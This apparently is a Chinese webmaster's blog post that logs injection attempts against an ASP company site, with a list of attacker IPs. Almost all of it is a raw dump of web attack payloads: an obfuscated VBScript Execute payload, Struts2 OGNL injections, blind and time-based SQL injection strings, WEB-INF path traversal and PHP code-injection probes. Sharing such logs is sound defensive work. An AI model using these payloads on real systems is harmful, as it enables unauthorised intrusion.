当前位置:重庆分类目录 » 目录资讯 » 电脑网络 » 站长 » 站长资讯 » 网站注入代码记录

网站注入代码记录

来源:本站原创  浏览:672次  时间:2019-05-05

做为一个公司的网站管理员一个字累!防不胜防网站经常遭遇了因攻击注入非法信息,特别是asp网站程序,大量的扫描及注入代码!以下看看入侵是用什么代码注入你的网站!

恶意IP注入

108.162.215.122
162.158.58.97
172.68.132.45
172.68.141.104
172.68.141.20
172.68.142.171
172.68.47.172
173.245.48.139
172.68.132.45
172.68.141.104
172.68.141.20
172.68.141.236
172.68.142.171
172.68.47.172
173.245.48.139
173.245.48.97
180.97.106.163
180.97.106.164
180.97.106.39
180.97.106.163
180.97.106.164
180.97.106.39

000001

000001

000484

000712

000745

Execute                              ("                              Execute                              (""          :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):                    Execute                              (""""On Error Resume Next:""""&bd(""""526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229"""")):Response.Write(""""|<-""""):Response.End"")")


${#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

${@print(md5(812812))}

${@print(md5(812812

%{#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}

%{(#test=*multipart/form-data*).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[*com.opensymphony.xwork2.ActionContext.container*]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(*text/html

(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4624=4624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)))

(SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2130=2130) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(98)||CHR(113)))

(SELECT (CHR(113)||CHR(122)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8814=8814) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(112)||CHR(113)))

(SELECT (CHR(113)||CHR(98)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(106)||CHR(113)))

(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4070=4070) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))

(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9952=9952) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))

(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8386=8386) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))

(SELECT CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7434=7434) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(106)+CHAR(113))

(SELECT CONCAT(0x7162716271,(SELECT (ELT(7981=7981,1))),0x7176626a71))

(SELECT CONCAT(0x7170707671,(SELECT (ELT(3194=3194,1))),0x716a6a7671))

(SELECT CONCAT(0x71767a7871,(SELECT (ELT(6582=6582,1))),0x71707a6271))

(SELECT CONCAT(0x717a6b7071,(SELECT (ELT(5363=5363,1))),0x717a787071))

*

*]

*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*

*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2

*+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*

*+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2

../../WEB-INF/web.xm

../../WEB-INF/web.xml

../../WEB-INF/web

..\..\WEB-INF/web.xm

..\..\WEB-INF/web.xml

..\..\WEB-INF/web

/**/cOnVeRt(int,(char(33)+char(126)+char(33)+(char(65)+char(66)+char(67)+char(49)+char(52)+char(53)+char(90)+char(81)+char(54)+char(50)+char(68)+char(87)+char(81)+char(65)+char(70)+char(80)+char(79)+char(73)+char(89)+char(67)+char(70)+char(68))+char(33)+char(126)+char(33)))

/../../WEB-INF/web.xm

/../../WEB-INF/web.xml

/../../WEB-INF/web

/usr/bin/id

;${@print(md5(812812))};//

;${@print(md5(812812))

\..\..\WEB-INF\web.xm

\..\..\WEB-INF\web.xml

\..\..\WEB-INF\web

\\..\....\\....\\WEB-INF\web.xm

\\..\....\\....\\WEB-INF\web.xml

\\..\....\\....\\WEB-INF\web

\\..\\..\\WEB-INF\\web.xm

\\..\\..\\WEB-INF\\web.xml

\\..\\..\\WEB-INF\\web

];${@print(md5(812812))};//

];${@print(md5(812812))

=

0 ORDER BY 1#

0" ORDER BY 1#

0") ORDER BY 1#

0-(-8281*2)-8281-8281

0) ORDER BY 1#

1 ORDER BY 1#

1"

1" ORDER BY 1#

1") ORDER BY 1#

1-(-8281*2)-8281-8281

1) ORDER BY 1#

1*

-1001

105 AnD BeNChMaRK(2999999,MD5(NOW()))

105&&BeNChMaRK(2999999,MD5(NOW()))

105&&SlEEp(3)

-1051

-1986

-1990

-1998

2 AnD BeNChMaRK(2999999,MD5(NOW()))

2 ORDER BY 1#

2" ORDER BY 1#

2") ORDER BY 1#

2&&BeNChMaRK(2999999,MD5(NOW()))

2&&SlEEp(3)

2-(-8281*2)-8281-8279

2-(-8281*2)-8281-8281

2) ORDER BY 1#

-2000

-2003) ORDER BY 1#

-2003

-2995

-2997

2and1=1

2AND1=1

2and1>1

3 ORDER BY 1#

3" ORDER BY 1#

3-(-8281*2)-8281-8281

3) ORDER BY 1#

-3000

-3918

392 AnD BeNChMaRK(2999999,MD5(NOW()))

392&&BeNChMaRK(2999999,MD5(NOW()))

392&&SlEEp(3)

-3921

-3994

-3998

4-(-8281*2)-8281-8281

-4001

-4003

-4102

-4104

-4111

-4112

-4113) ORDER BY 1#

-4119

-4127

-4128) ORDER BY 1#

-4553

-4557

-4558

456 AnD BeNChMaRK(2999999,MD5(NOW()))

456&&BeNChMaRK(2999999,MD5(NOW()))

456&&SlEEp(3)

-4568

-4569

-4573

-4599

460 AnD BeNChMaRK(2999999,MD5(NOW()))

460&&BeNChMaRK(2999999,MD5(NOW()))

460&&SlEEp(3)

-4604

461 AnD BeNChMaRK(2999999,MD5(NOW()))

461&&BeNChMaRK(2999999,MD5(NOW()))

461&&SlEEp(3)

-4610

-4611

-4624

-4628

463 AnD BeNChMaRK(2999999,MD5(NOW()))

463&&BeNChMaRK(2999999,MD5(NOW()))

463&&SlEEp(3)

-4633

-4669

467 AnD BeNChMaRK(2999999,MD5(NOW()))

467&&BeNChMaRK(2999999,MD5(NOW()))

467&&SlEEp(3)

-4676

-4677

467cp.asp?lx=big

-4689

-4696

-4774

-4777

478 AnD BeNChMaRK(2999999,MD5(NOW()))

478&&BeNChMaRK(2999999,MD5(NOW()))

478&&SlEEp(3)

-4789

479 AnD BeNChMaRK(2999999,MD5(NOW()))

479&&BeNChMaRK(2999999,MD5(NOW()))

479&&SlEEp(3)

-4797

-4799

-4832

-4835

484 AnD BeNChMaRK(2999999,MD5(NOW()))

484 AND SLEEP(5)-- xJzB

484 AND SLEEP(5)

484 ORDER BY 1-- FloG

484 ORDER BY 1-- rIqq

484 ORDER BY 1#

484&&BeNChMaRK(2999999,MD5(NOW()))

484&&SlEEp(3)

484-(-8281*2)-8281-8281

484)

484) ORDER BY 1-- PWWX

484) ORDER BY 1#

-4841

484cp.asp?lx=big

485?newsid=485

-4860

-4909

491 AnD BeNChMaRK(2999999,MD5(NOW()))

491&&BeNChMaRK(2999999,MD5(NOW()))

491&&SlEEp(3)

-4911

-4990

-4994

-4999

5-(-8281*2)-8281-8281

-5002

-5005

-5018

502?newsid=502

-5026

-5028

503-(-8281*2)-8281-8281

-5030

-5032

-5047

-5106

511 AnD BeNChMaRK(2999999,MD5(NOW()))

511&&BeNChMaRK(2999999,MD5(NOW()))

511&&SlEEp(3)

-5113

-5119

512 AnD BeNChMaRK(2999999,MD5(NOW()))

512&&BeNChMaRK(2999999,MD5(NOW()))

523?newsid=523

-5231

-5232

-5234

-5685) ORDER BY 1#

-5815

582 AnD BeNChMaRK(2999999,MD5(NOW()))

582&&BeNChMaRK(2999999,MD5(NOW()))

582&&SlEEp(3)

-5821

-5824

-5838

-5841

-5852

-5855

586 AnD BeNChMaRK(2999999,MD5(NOW()))

586&&BeNChMaRK(2999999,MD5(NOW()))

586&&SlEEp(3)

-5861

-5900

-5903

-5909

591 AnD BeNChMaRK(2999999,MD5(NOW()))

591&&BeNChMaRK(2999999,MD5(NOW()))

591&&SlEEp(3)

-5910

-5920

-5921

-5922

-5923

-5928

593?newsid=593

-5933

-5958

596?newsid=596

-5963

-5964

-5969

-5971) ORDER BY 1#

-5973

-5974

-5979

-5987

-5989

599 AnD BeNChMaRK(2999999,MD5(NOW()))

599&&BeNChMaRK(2999999,MD5(NOW()))

603 AnD BeNChMaRK(2999999,MD5(NOW()))

603&&BeNChMaRK(2999999,MD5(NOW()))

603&&SlEEp(3)

-6030

-6031

-6037

-6039

-6044

-6046

-6047

-6049

-6051

-6056

-6069

607?bookid=607

-6072

-6074

-6077

-6080

-6088

-6091

-6093

-6094

-6096) ORDER BY 1#

-6098

-6144

615 ORDER BY 1#

615-(-8281*2)-8281-8281

615) ORDER BY 1#

-6174

-6179

618-(-8281*2)-8281-8281

-6184

-6189

619 ORDER BY 1#

619" ORDER BY 1#

619") ORDER BY 1#

619-(-8281*2)-8281-8281

619) ORDER BY 1#

619?newsid=619

-6190

-6192

-6194

-6199

620?newsid=620

-6206

-6207

-6210

622?newsid=622

-6224

-6257

-6259

626 AnD BeNChMaRK(2999999,MD5(NOW()))

626&&BeNChMaRK(2999999,MD5(NOW()))

626&&SlEEp(3)

-6261

-6266) ORDER BY 1#

-6266

-6267

-9981

-9986

-9987

-9989

-9992

-9994

-9995

BchR1FPK

big ORDER BY 1#

big" ORDER BY 1#

big") ORDER BY 1#

big&

big) ORDER BY 1#

command

data://text/plain

Execute                              ("                              Execute                              (""          :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):                    Execute                              (""""On Error Resume Next:""""&bd(""""526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229"""")):Response.Write(""""|<-""""):Response.End"")")

set

string:{var_dump(md5(81281

string:{var_dump(md5(812812))}

UTF-8

WEB-INF/

WEB-INF/web.xm

WEB-INF/web.xml

WEB-INF/web

WEB-INF\web.xm

WEB-INF\web.xml

WEB-INF\web

x||set||x


网站注入

网站攻击


总之,特殊字符用得最多!